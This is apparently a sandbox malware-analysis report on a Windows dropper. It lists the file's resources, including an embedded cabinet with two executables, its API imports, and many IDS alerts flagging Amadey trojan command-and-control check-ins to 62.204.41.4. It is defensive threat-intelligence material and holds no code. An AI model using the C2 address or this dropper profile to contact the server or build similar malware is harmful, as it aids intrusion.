                          RT_ICON0x239500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                          RT_ICON0x242d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                          RT_DIALOG0x247400x2f2dataEnglishUnited States
                          RT_DIALOG0x24a340x35cdataRussianRussia
                          RT_DIALOG0x24d900x1b0dataEnglishUnited States
                          RT_DIALOG0x24f400x1b4dataRussianRussia
                          RT_DIALOG0x250f40x166dataEnglishUnited States
                          RT_DIALOG0x2525c0x168dataRussianRussia
                          RT_DIALOG0x253c40x1c0dataEnglishUnited States
                          RT_DIALOG0x255840x1e0dataRussianRussia
                          RT_DIALOG0x257640x130dataEnglishUnited States
                          RT_DIALOG0x258940x150dataRussianRussia
                          RT_DIALOG0x259e40x120dataEnglishUnited States
                          RT_DIALOG0x25b040x122dataRussianRussia
                          RT_STRING0x25c280x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States
                          RT_STRING0x25cb40x86Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0RussianRussia
                          RT_STRING0x25d3c0x520dataEnglishUnited States
                          RT_STRING0x2625c0x52edataRussianRussia
                          RT_STRING0x2678c0x5ccdataEnglishUnited States
                          RT_STRING0x26d580x592dataRussianRussia
                          RT_STRING0x272ec0x4b0dataEnglishUnited States
                          RT_STRING0x2779c0x4b2dataRussianRussia
                          RT_STRING0x27c500x44adataEnglishUnited States
                          RT_STRING0x2809c0x43edataRussianRussia
                          RT_STRING0x284dc0x3cedataEnglishUnited States
                          RT_STRING0x288ac0x2fcdataRussianRussia
                          RT_RCDATA0x28ba80x7ASCII text, with no line terminatorsEnglishUnited States
                          RT_RCDATA0x28bb00x5ce06Microsoft Cabinet archive data, many, 380422 bytes, 2 files, at 0x2c +A "bfCg.exe" +A "xriv.exe", ID 1563, number 1, 18 datablocks, 0x1503 compressionEnglishUnited States
                          RT_RCDATA0x859b80x4dataEnglishUnited States
                          RT_RCDATA0x859bc0x24dataEnglishUnited States
                          RT_RCDATA0x859e00x7ASCII text, with no line terminatorsEnglishUnited States
                          RT_RCDATA0x859e80x7ASCII text, with no line terminatorsEnglishUnited States
                          RT_RCDATA0x859f00x4dataEnglishUnited States
                          RT_RCDATA0x859f40x9ASCII text, with no line terminatorsEnglishUnited States
                          RT_RCDATA0x85a000x4dataEnglishUnited States
                          RT_RCDATA0x85a040x9ASCII text, with no line terminatorsEnglishUnited States
                          RT_RCDATA0x85a100x4dataEnglishUnited States
                          RT_RCDATA0x85a140x6dataEnglishUnited States
                          RT_RCDATA0x85a1c0x7ASCII text, with no line terminatorsEnglishUnited States
                          RT_RCDATA0x85a240x7ASCII text, with no line terminatorsEnglishUnited States
                          RT_GROUP_ICON0x85a2c0xbcdataEnglishUnited States
                          RT_VERSION0x85ae80x408dataEnglishUnited States
                          RT_VERSION0x85ef00x410dataRussianRussia
                          RT_MANIFEST0x863000x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                          DLLImport
                          ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                          KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
                          GDI32.dllGetDeviceCaps
                          USER32.dllSetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
                          msvcrt.dll_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
                          COMCTL32.dll
                          Cabinet.dll
                          VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States
                          RussianRussia
                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                          192.168.2.662.204.41.449858802027700 02/07/23-20:01:29.126524TCP2027700ET TROJAN Amadey CnC Check-In4985880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450186802027700 02/07/23-20:03:04.107236TCP2027700ET TROJAN Amadey CnC Check-In5018680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450318802027700 02/07/23-20:03:38.985319TCP2027700ET TROJAN Amadey CnC Check-In5031880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450088802027700 02/07/23-20:02:36.767849TCP2027700ET TROJAN Amadey CnC Check-In5008880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450284802027700 02/07/23-20:03:30.624651TCP2027700ET TROJAN Amadey CnC Check-In5028480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449763802027700 02/07/23-20:01:01.550107TCP2027700ET TROJAN Amadey CnC Check-In4976380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449791802027700 02/07/23-20:01:10.547144TCP2027700ET TROJAN Amadey CnC Check-In4979180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450030802027700 02/07/23-20:02:18.384404TCP2027700ET TROJAN Amadey CnC Check-In5003080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450382802027700 02/07/23-20:03:54.707955TCP2027700ET TROJAN Amadey CnC Check-In5038280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450480802027700 02/07/23-20:04:18.662379TCP2027700ET TROJAN Amadey CnC Check-In5048080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449800802027700 02/07/23-20:01:12.702989TCP2027700ET TROJAN Amadey CnC Check-In4980080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449956802027700 02/07/23-20:01:56.737292TCP2027700ET TROJAN Amadey CnC Check-In4995680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450416802027700 02/07/23-20:04:03.085073TCP2027700ET TROJAN Amadey CnC Check-In5041680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450125802027700 02/07/23-20:02:46.439463TCP2027700ET TROJAN Amadey CnC Check-In5012580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450379802027700 02/07/23-20:03:53.987905TCP2027700ET TROJAN Amadey CnC Check-In5037980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450477802027700 02/07/23-20:04:17.942956TCP2027700ET TROJAN Amadey CnC Check-In5047780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450027802027700 02/07/23-20:02:17.657151TCP2027700ET TROJAN Amadey CnC Check-In5002780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450223802027700 02/07/23-20:03:13.167790TCP2027700ET TROJAN Amadey CnC Check-In5022380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450321802027700 02/07/23-20:03:39.741323TCP2027700ET TROJAN Amadey CnC Check-In5032180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450256802027700 02/07/23-20:03:21.219153TCP2027700ET TROJAN Amadey CnC Check-In5025680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449796802027700 02/07/23-20:01:11.751019TCP2027700ET TROJAN Amadey CnC Check-In4979680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449951802027700 02/07/23-20:01:55.550313TCP2027700ET TROJAN Amadey CnC Check-In4995180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450002802027700 02/07/23-20:02:11.408990TCP2027700ET TROJAN Amadey CnC Check-In5000280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450411802027700 02/07/23-20:04:01.821830TCP2027700ET TROJAN Amadey CnC Check-In5041180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449928802027700 02/07/23-20:01:49.894595TCP2027700ET TROJAN Amadey CnC Check-In4992880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450120802027700 02/07/23-20:02:44.901958TCP2027700ET TROJAN Amadey CnC Check-In5012080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450161802027700 02/07/23-20:02:58.254042TCP2027700ET TROJAN Amadey CnC Check-In5016180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450374802027700 02/07/23-20:03:52.768199TCP2027700ET TROJAN Amadey CnC Check-In5037480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450469802027700 02/07/23-20:04:16.004547TCP2027700ET TROJAN Amadey CnC Check-In5046980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450215802027700 02/07/23-20:03:11.200842TCP2027700ET TROJAN Amadey CnC Check-In5021580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450452802027700 02/07/23-20:04:11.861795TCP2027700ET TROJAN Amadey CnC Check-In5045280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449833802027700 02/07/23-20:01:20.483013TCP2027700ET TROJAN Amadey CnC Check-In4983380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450019802027700 02/07/23-20:02:15.689584TCP2027700ET TROJAN Amadey CnC Check-In5001980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449727802027700 02/07/23-20:00:53.058922TCP2027700ET TROJAN Amadey CnC Check-In4972780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450055802027700 02/07/23-20:02:24.503969TCP2027700ET TROJAN Amadey CnC Check-In5005580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449886802027700 02/07/23-20:01:35.832637TCP2027700ET TROJAN Amadey CnC Check-In4988680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450091802027700 02/07/23-20:02:37.622394TCP2027700ET TROJAN Amadey CnC Check-In5009180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450346802027700 02/07/23-20:03:45.861770TCP2027700ET TROJAN Amadey CnC Check-In5034680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449768802027700 02/07/23-20:01:02.811173TCP2027700ET TROJAN Amadey CnC Check-In4976880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450096802027700 02/07/23-20:02:38.862015TCP2027700ET TROJAN Amadey CnC Check-In5009680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449964802027700 02/07/23-20:01:58.773796TCP2027700ET TROJAN Amadey CnC Check-In4996480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450251802027700 02/07/23-20:03:20.007203TCP2027700ET TROJAN Amadey CnC Check-In5025180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449923802027700 02/07/23-20:01:46.547163TCP2027700ET TROJAN Amadey CnC Check-In4992380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450292802027700 02/07/23-20:03:32.559192TCP2027700ET TROJAN Amadey CnC Check-In5029280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449881802027700 02/07/23-20:01:34.599060TCP2027700ET TROJAN Amadey CnC Check-In4988180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449878802027700 02/07/23-20:01:34.080304TCP2027700ET TROJAN Amadey CnC Check-In4987880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449976802027700 02/07/23-20:02:01.442060TCP2027700ET TROJAN Amadey CnC Check-In4997680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449722802027700 02/07/23-20:00:51.810569TCP2027700ET TROJAN Amadey CnC Check-In4972280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449771802027700 02/07/23-20:01:03.532617TCP2027700ET TROJAN Amadey CnC Check-In4977180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449915802027700 02/07/23-20:01:43.056279TCP2027700ET TROJAN Amadey CnC Check-In4991580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450050802027700 02/07/23-20:02:23.248250TCP2027700ET TROJAN Amadey CnC Check-In5005080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450133802027700 02/07/23-20:02:51.437305TCP2027700ET TROJAN Amadey CnC Check-In5013380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450387802027700 02/07/23-20:03:55.955538TCP2027700ET TROJAN Amadey CnC Check-In5038780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449805802027700 02/07/23-20:01:13.918183TCP2027700ET TROJAN Amadey CnC Check-In4980580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450341802027700 02/07/23-20:03:44.643209TCP2027700ET TROJAN Amadey CnC Check-In5034180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450326802027700 02/07/23-20:03:40.953159TCP2027700ET TROJAN Amadey CnC Check-In5032680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450424802027700 02/07/23-20:04:05.016891TCP2027700ET TROJAN Amadey CnC Check-In5042480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450243802027700 02/07/23-20:03:17.999930TCP2027700ET TROJAN Amadey CnC Check-In5024380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450105802027700 02/07/23-20:02:41.198188TCP2027700ET TROJAN Amadey CnC Check-In5010580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450071802027700 02/07/23-20:02:32.235512TCP2027700ET TROJAN Amadey CnC Check-In5007180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450007802027700 02/07/23-20:02:12.669391TCP2027700ET TROJAN Amadey CnC Check-In5000780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450359802027700 02/07/23-20:03:49.032956TCP2027700ET TROJAN Amadey CnC Check-In5035980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449743802027700 02/07/23-20:00:56.902351TCP2027700ET TROJAN Amadey CnC Check-In4974380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449841802027700 02/07/23-20:01:22.423646TCP2027700ET TROJAN Amadey CnC Check-In4984180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449997802027700 02/07/23-20:02:10.169392TCP2027700ET TROJAN Amadey CnC Check-In4999780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450178802027700 02/07/23-20:03:02.400607TCP2027700ET TROJAN Amadey CnC Check-In5017880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450362802027700 02/07/23-20:03:49.798075TCP2027700ET TROJAN Amadey CnC Check-In5036280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449992802027700 02/07/23-20:02:06.575939TCP2027700ET TROJAN Amadey CnC Check-In4999280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450068802027700 02/07/23-20:02:31.452026TCP2027700ET TROJAN Amadey CnC Check-In5006880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450460802027700 02/07/23-20:04:13.772290TCP2027700ET TROJAN Amadey CnC Check-In5046080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449989802027700 02/07/23-20:02:05.120374TCP2027700ET TROJAN Amadey CnC Check-In4998980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449735802027700 02/07/23-20:00:54.983578TCP2027700ET TROJAN Amadey CnC Check-In4973580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450354802027700 02/07/23-20:03:47.847893TCP2027700ET TROJAN Amadey CnC Check-In5035480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450022802027700 02/07/23-20:02:16.443010TCP2027700ET TROJAN Amadey CnC Check-In5002280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450063802027700 02/07/23-20:02:28.396717TCP2027700ET TROJAN Amadey CnC Check-In5006380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450276802027700 02/07/23-20:03:28.648274TCP2027700ET TROJAN Amadey CnC Check-In5027680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449948802027700 02/07/23-20:01:54.830001TCP2027700ET TROJAN Amadey CnC Check-In4994880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450141802027700 02/07/23-20:02:53.400943TCP2027700ET TROJAN Amadey CnC Check-In5014180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450395802027700 02/07/23-20:03:57.910152TCP2027700ET TROJAN Amadey CnC Check-In5039580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450100802027700 02/07/23-20:02:39.901405TCP2027700ET TROJAN Amadey CnC Check-In5010080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450313802027700 02/07/23-20:03:37.774355TCP2027700ET TROJAN Amadey CnC Check-In5031380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450271802027700 02/07/23-20:03:27.422593TCP2027700ET TROJAN Amadey CnC Check-In5027180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449984802027700 02/07/23-20:02:03.441087TCP2027700ET TROJAN Amadey CnC Check-In4998480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449943802027700 02/07/23-20:01:53.532965TCP2027700ET TROJAN Amadey CnC Check-In4994380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449730802027700 02/07/23-20:00:53.793502TCP2027700ET TROJAN Amadey CnC Check-In4973080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450289802027700 02/07/23-20:03:31.813234TCP2027700ET TROJAN Amadey CnC Check-In5028980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450035802027700 02/07/23-20:02:19.615798TCP2027700ET TROJAN Amadey CnC Check-In5003580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450248802027700 02/07/23-20:03:19.236086TCP2027700ET TROJAN Amadey CnC Check-In5024880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450207802027700 02/07/23-20:03:09.251394TCP2027700ET TROJAN Amadey CnC Check-In5020780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450432802027700 02/07/23-20:04:06.987943TCP2027700ET TROJAN Amadey CnC Check-In5043280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450390802027700 02/07/23-20:03:56.676042TCP2027700ET TROJAN Amadey CnC Check-In5039080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450174802027700 02/07/23-20:03:01.410759TCP2027700ET TROJAN Amadey CnC Check-In5017480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450367802027700 02/07/23-20:03:51.006859TCP2027700ET TROJAN Amadey CnC Check-In5036780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449748802027700 02/07/23-20:00:58.128864TCP2027700ET TROJAN Amadey CnC Check-In4974880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450015802027700 02/07/23-20:02:14.676485TCP2027700ET TROJAN Amadey CnC Check-In5001580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450113802027700 02/07/23-20:02:43.134587TCP2027700ET TROJAN Amadey CnC Check-In5011380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450269802027700 02/07/23-20:03:26.932435TCP2027700ET TROJAN Amadey CnC Check-In5026980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450263802027700 02/07/23-20:03:25.380080TCP2027700ET TROJAN Amadey CnC Check-In5026380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450272802027700 02/07/23-20:03:27.657286TCP2027700ET TROJAN Amadey CnC Check-In5027280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450370802027700 02/07/23-20:03:51.805979TCP2027700ET TROJAN Amadey CnC Check-In5037080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450361802027700 02/07/23-20:03:49.565590TCP2027700ET TROJAN Amadey CnC Check-In5036180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449739802027700 02/07/23-20:00:55.935980TCP2027700ET TROJAN Amadey CnC Check-In4973980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450006802027700 02/07/23-20:02:12.401268TCP2027700ET TROJAN Amadey CnC Check-In5000680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450358802027700 02/07/23-20:03:48.800828TCP2027700ET TROJAN Amadey CnC Check-In5035880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449837802027700 02/07/23-20:01:21.459260TCP2027700ET TROJAN Amadey CnC Check-In4983780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450202802027700 02/07/23-20:03:08.029585TCP2027700ET TROJAN Amadey CnC Check-In5020280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450456802027700 02/07/23-20:04:12.818077TCP2027700ET TROJAN Amadey CnC Check-In5045680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450104802027700 02/07/23-20:02:40.952138TCP2027700ET TROJAN Amadey CnC Check-In5010480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449809802027700 02/07/23-20:01:14.874634TCP2027700ET TROJAN Amadey CnC Check-In4980980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450333802027700 02/07/23-20:03:42.674478TCP2027700ET TROJAN Amadey CnC Check-In5033380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450235802027700 02/07/23-20:03:16.065619TCP2027700ET TROJAN Amadey CnC Check-In5023580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450431802027700 02/07/23-20:04:06.742108TCP2027700ET TROJAN Amadey CnC Check-In5043180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449910802027700 02/07/23-20:01:41.844449TCP2027700ET TROJAN Amadey CnC Check-In4991080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449977802027700 02/07/23-20:02:01.710756TCP2027700ET TROJAN Amadey CnC Check-In4997780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449723802027700 02/07/23-20:00:52.073819TCP2027700ET TROJAN Amadey CnC Check-In4972380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449879802027700 02/07/23-20:01:34.335804TCP2027700ET TROJAN Amadey CnC Check-In4987980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449821802027700 02/07/23-20:01:17.548025TCP2027700ET TROJAN Amadey CnC Check-In4982180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449812802027700 02/07/23-20:01:15.578134TCP2027700ET TROJAN Amadey CnC Check-In4981280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449968802027700 02/07/23-20:01:59.735492TCP2027700ET TROJAN Amadey CnC Check-In4996880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449770802027700 02/07/23-20:01:03.285971TCP2027700ET TROJAN Amadey CnC Check-In4977080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449767802027700 02/07/23-20:01:02.575091TCP2027700ET TROJAN Amadey CnC Check-In4976780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449882802027700 02/07/23-20:01:34.875626TCP2027700ET TROJAN Amadey CnC Check-In4988280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450440802027700 02/07/23-20:04:08.934141TCP2027700ET TROJAN Amadey CnC Check-In5044080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450291802027700 02/07/23-20:03:32.300203TCP2027700ET TROJAN Amadey CnC Check-In5029180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449971802027700 02/07/23-20:02:00.459434TCP2027700ET TROJAN Amadey CnC Check-In4997180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450244802027700 02/07/23-20:03:18.251405TCP2027700ET TROJAN Amadey CnC Check-In5024480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450429802027700 02/07/23-20:04:06.205613TCP2027700ET TROJAN Amadey CnC Check-In5042980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450339802027700 02/07/23-20:03:44.150750TCP2027700ET TROJAN Amadey CnC Check-In5033980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450043802027700 02/07/23-20:02:21.535774TCP2027700ET TROJAN Amadey CnC Check-In5004380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450297802027700 02/07/23-20:03:33.829768TCP2027700ET TROJAN Amadey CnC Check-In5029780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450132802027700 02/07/23-20:02:51.157888TCP2027700ET TROJAN Amadey CnC Check-In5013280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450173802027700 02/07/23-20:03:01.155358TCP2027700ET TROJAN Amadey CnC Check-In5017380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450386802027700 02/07/23-20:03:55.723368TCP2027700ET TROJAN Amadey CnC Check-In5038680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450216802027700 02/07/23-20:03:11.470014TCP2027700ET TROJAN Amadey CnC Check-In5021680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450428802027700 02/07/23-20:04:05.975695TCP2027700ET TROJAN Amadey CnC Check-In5042880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450084802027700 02/07/23-20:02:35.626446TCP2027700ET TROJAN Amadey CnC Check-In5008480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449952802027700 02/07/23-20:01:55.791186TCP2027700ET TROJAN Amadey CnC Check-In4995280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450412802027700 02/07/23-20:04:02.064925TCP2027700ET TROJAN Amadey CnC Check-In5041280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449911802027700 02/07/23-20:01:42.093950TCP2027700ET TROJAN Amadey CnC Check-In4991180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450305802027700 02/07/23-20:03:35.785500TCP2027700ET TROJAN Amadey CnC Check-In5030580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449751802027700 02/07/23-20:00:58.872163TCP2027700ET TROJAN Amadey CnC Check-In4975180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449840802027700 02/07/23-20:01:22.187785TCP2027700ET TROJAN Amadey CnC Check-In4984080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449898802027700 02/07/23-20:01:38.811965TCP2027700ET TROJAN Amadey CnC Check-In4989880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450399802027700 02/07/23-20:03:58.878195TCP2027700ET TROJAN Amadey CnC Check-In5039980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450047802027700 02/07/23-20:02:22.518279TCP2027700ET TROJAN Amadey CnC Check-In5004780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450145802027700 02/07/23-20:02:54.357855TCP2027700ET TROJAN Amadey CnC Check-In5014580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450231802027700 02/07/23-20:03:15.107613TCP2027700ET TROJAN Amadey CnC Check-In5023180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450056802027700 02/07/23-20:02:24.870217TCP2027700ET TROJAN Amadey CnC Check-In5005680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450228802027700 02/07/23-20:03:14.349981TCP2027700ET TROJAN Amadey CnC Check-In5022880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450062802027700 02/07/23-20:02:28.090658TCP2027700ET TROJAN Amadey CnC Check-In5006280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450317802027700 02/07/23-20:03:38.748560TCP2027700ET TROJAN Amadey CnC Check-In5031780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450219802027700 02/07/23-20:03:12.179097TCP2027700ET TROJAN Amadey CnC Check-In5021980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449838802027700 02/07/23-20:01:21.703798TCP2027700ET TROJAN Amadey CnC Check-In4983880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450457802027700 02/07/23-20:04:13.065112TCP2027700ET TROJAN Amadey CnC Check-In5045780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449936802027700 02/07/23-20:01:51.820246TCP2027700ET TROJAN Amadey CnC Check-In4993680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450301802027700 02/07/23-20:03:34.801016TCP2027700ET TROJAN Amadey CnC Check-In5030180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450203802027700 02/07/23-20:03:08.264782TCP2027700ET TROJAN Amadey CnC Check-In5020380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449853802027700 02/07/23-20:01:25.706873TCP2027700ET TROJAN Amadey CnC Check-In4985380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449894802027700 02/07/23-20:01:37.843818TCP2027700ET TROJAN Amadey CnC Check-In4989480192.168.2.662.204.41.4
